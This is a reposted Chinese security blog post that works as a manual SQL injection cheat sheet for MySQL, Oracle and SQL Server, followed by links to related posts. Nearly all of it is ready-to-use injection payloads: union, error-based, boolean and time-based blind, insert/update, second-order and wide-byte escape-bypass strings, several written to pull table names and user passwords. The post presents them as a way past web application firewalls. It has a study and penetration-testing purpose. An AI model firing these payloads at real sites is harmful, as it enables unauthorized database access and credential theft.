转载自 Norah C.IV
转载自 乌雲安全
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正!
0x01 Mysql 手工注入
1.1 联合注入
1 | ?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+#group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name |
1.2 报错注入
1 | 1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); |
每个一个报错语句都有它的原理:
exp() 报错的原理:exp 是一个数学函数,取e的x次方,当我们输入的值大于709就会报错,然后 ~ 取反它的值总会大于709,所以报错。
updatexml() 报错的原理:由于 updatexml 的第二个参数需要 Xpath 格式的字符串,以 ~ 开头的内容不是 xml 格式的语法,concat() 函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。
1 | 爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- + |
这里需要注意的是它加了连接字符,导致数据中的 md5 只能爆出 31 位,这里可以用分割函数分割出来:
1 | substr(string string,num start,num length);#string为字符串,start为起始位置,length为长度 |
1.3 盲注
1.3.1 时间盲注
时间盲注也叫延时注入 一般用到函数 sleep() BENCHMARK() 还可以使用笛卡尔积(尽量不要使用,内容太多会很慢很慢)
一般时间盲注我们还需要使用条件判断函数
1 | #if(expre1,expre2,expre3)当 expre1 为 true 时,返回 expre2,false 时,返回 expre3 |
我们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号,常用到的就有 ascii() hex() 等等
1 | ?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+ |
1.3.2 布尔盲注
1 | ?id=1' and substr((select user()),1,1)='r' -- +?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +#如果 IFNULL 第一个参数的表达式为 NULL,则返回第二个参数的备用值,不为 Null 则输出值 |
1.4 insert,delete,update
insert,delete,update 主要是用到盲注和报错注入,此类注入点不建议使用 sqlmap 等工具,会造成大量垃圾数据,一般这种注入会出现在 注册、ip头、留言板等等需要写入数据的地方,同时这种注入不报错一般较难发现,我们可以尝试性插入、引号、双引号、转义符 \ 让语句不能正常执行,然后如果插入失败,更新失败,然后深入测试确定是否存在注入
1.4.1 报错
1 | mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");Query OK, 1 row affected (0.00 sec) |
1.4.2 盲注
1 | #int型 可以使用 运算符 比如 加减乘除 and or 异或 移位等等mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin");Query OK, 1 row affected (5.00 sec) |
1.5 二次注入与宽字节注入
二次注入的语句:在没有被单引号包裹的sql语句下,我们可以用16进制编码他,这样就不会带有单引号等。
1 | mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');Query OK, 1 row affected (0.00 sec) |
二次注入在没有源码的情况比较难发现,通常见于注册,登录恶意账户后,数据库可能会因为恶意账户名的问题,将 admin’–+ 误认为 admin 账户
宽字节注入:针对目标做了一定的防护,单引号转变为 \' , mysql 会将 \ 编码为 %5c ,宽字节中两个字节代表一个汉字,所以把 %df 加上 %5c 就变成了一个汉字“運”,使用这种方法成功绕过转义,就是所谓的宽字节注入
1 | id=-1%df' union select... |
0x02 Oracle 手工注入
2.1 联合注入
1 | ?id=-1' union select user,null from dual--?id=-1' union select version,null from v$instance--?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--?id=-1' union select username,passwd from users--?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)-- |
2.2 报错注入
1 | ?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))--?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))-- |
2.3 盲注
2.3.1 布尔盲注
既然是盲注,那么肯定涉及到条件判断语句,Oracle除了使用IF the else end if这种复杂的,还可以使用 decode() 函数。
语法:decode(条件,值1,返回值1,值2,返回值2,…值n,返回值n,缺省值);
该函数的含义如下:
1 | IF 条件=值1 THEN RETURN(返回值1)ELSIF 条件=值2 THEN RETURN(返回值2) ......ELSIF 条件=值n THEN RETURN(返回值n)ELSE RETURN(缺省值)END IF |
1 | ?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--?id=1' and ascii(substr(user,1,1))> 64-- #二分法 |
2.3.2 时间盲注
可使用DBMS_PIPE.RECEIVE_MESSAGE(‘任意值’,延迟时间)函数进行时间盲注,这个函数可以指定延迟的时间
1 | ?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)-- |
0x03 SQL server 手工注入
3.1 联合注入
1 | ?id=-1' union select null,null--?id=-1' union select @@servername, @@version--?id=-1' union select db_name(),suser_sname()--?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null-- |
3.2 报错注入
1 | ?id=1' and 1=(select 1/@@servername)--?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))-- |
3.3 盲注
3.3.1 布尔盲注
1 | ?id=1' and ascii(substring((select db_ name(1)),1,1))> 64-- |
3.3.2 时间盲注
1 | ?id= 1';if(2>1) waitfor delay '0:0:5'--?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay '0:0:2'-- |
XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 XR-SEC!
相关推荐
2021-10-03
Goby Server By Docker
About Attack surface mapping The new generation of network security technology achieves rapid security emergency through the establishment of a complete asset database for the target. Info123127.0.0.1:15001Username: gobyPassword: docker logs goby | grep " Goby_PassWord :" Github : https://github.com/XRSec/Goby-Docker.git UseInStall12345docker run -it --name goby -p 15001:15001 -e password=password -e port=15001 xrsec/goby:latest# Installing containers or updating goby requires ...
2021-02-27
HTTP请求码对照表
转载自 Norah C.IV Status Code状态码详解对照表 状态码 含义 100 客户端应当继续发送请求。这个临时响应是用来通知客户端它的部分请求已经被服务器接收,且仍未被拒绝。客户端应当继续发送请求的剩余部分,或者如果请求已经完成,忽略这个响应。服务器必须在请求完成后向客户端发送一个最终响应。 101 服务器已经理解了客户端的请求,并将通过Upgrade 消息头通知客户端采用不同的协议来完成这个请求。在发送完这个响应最后的空行后,服务器将会切换到在Upgrade 消息头中定义的那些协议。 只有在切换新的协议更有好处的时候才应该采取类似措施。例如,切换到新的HTTP 版本比旧版本更有优势,或者切换到一个实时且同步的协议以传送利用此类特性的资源。 102 由WebDAV(RFC 2518)扩展的状态码,代表处理将被继续执行。 200 请求已成功,请求所希望的响应头或数据体将随此响应返回。 201 请求已经被实现,而且有一个新的资源已经依据请求的需要而建立,且其 URI 已经随Location 头信息返回。假如需要的资源无法及时建立的话,应当...
2022-02-25
Hackone 环境搭建
网络环境 Vmware PIN1Group_FW -> openwrt-x86-64-generic-squashfs-combined-efi -> StarWind V2V Converter -> vmwre_new -> 其他linux64位 -> 2h2g -> 桥接 -> vi_network_config@Router -> vist -> 防火墙全部接受 -> 接口修改 -> 不桥接接口-> 博客 passwall -> 订阅 -> 全局 -> 高级设置 kali -> 修改网络配置文件 -> 网络测试 windows 同理 1234567891011121314# kali 网络修改sudo vi /etc/network/interfacesauto eth0iface eth0 inet staticaddress 192.168.11.145netmask 255.255.255.0gateway openwrt_ipcat /etc/resolv....
2021-09-26
Vulnhub EvilBox靶机打靶过程
靶机详解难度: 中级 环境 kali Linux 2021 192.168.0.104Linux Kernel 192.168.0.103 涉及技术主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始1sudo arp-scan -l 进行主机发现 发现目标主机IP为 192.168.0.103 进行端口扫描 1nmap -sC -sV -p- 192.168.0.103 发现目标主机打开的22,80端口,首先率先考虑 80 端口是否存在漏洞 打开后发现如下, 使用 dirsearch 进行目录爆破 1dirsearch -u http://192.168.0.103/ -w /home/yifang/fuzz/dirtop60000.txt -f 发现目标存在 secret文件夹,打开后发现了一段字符 hacker ,继续使用dirsearch 进行目录爆破,发现了在secret下有一个evil.php的文件。此时的渗透工作似乎进入了瓶颈期,想到了可以对evil.php下的文件的get ...
2021-09-05
Vulnhub靶机打靶-hard-socnet2
Author: yifang 靶机详情 难度:高Tips 涉及知识:主机发现 端口扫描 SQL注入 文件上传 蚁剑上线 CVE-2021-3493 XMLRPC 逆向工程 动态调试 缓冲区溢出 漏洞利用代码编写 靶机下载地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova攻击方法有2种,CVE-2021-3493 另类提权方式攻击主机:kali Linux 2021 192.168.0.103目标主机: Ubuntu 18 攻击开始1nmap -p- -sV -sC 192.168.0.102 目标主机打开了22,80,8000端口 经过测试,80页面允许正常访问,8000端口不允许任何HTTP连接方式,猜测可能存在另类服务。 访问80页面发现存在当前页面, 二话不说直接进行sqlmap跑一波 前端存在SQL漏洞,获得admin账户进行登录,使用更改头像功能,上一句话木马, 蚁剑测试连接成功! 可以看到获得的权限为www-data权限,尝试进行提权 123456(www-dat...
2021-06-11
Web RTC
RESUMEWebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准。 测试网站:https://ip.voidsec.com/ 插件:https://mybrowseraddon.com/webrtc-control.html 直连模式 Socks5代理模式 Burp-Suite 抓包模式 Burp-Suite 设置上级Socks代理 Burp-Suite建议添加上级代理 XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright no...
评论
WalineGitalk
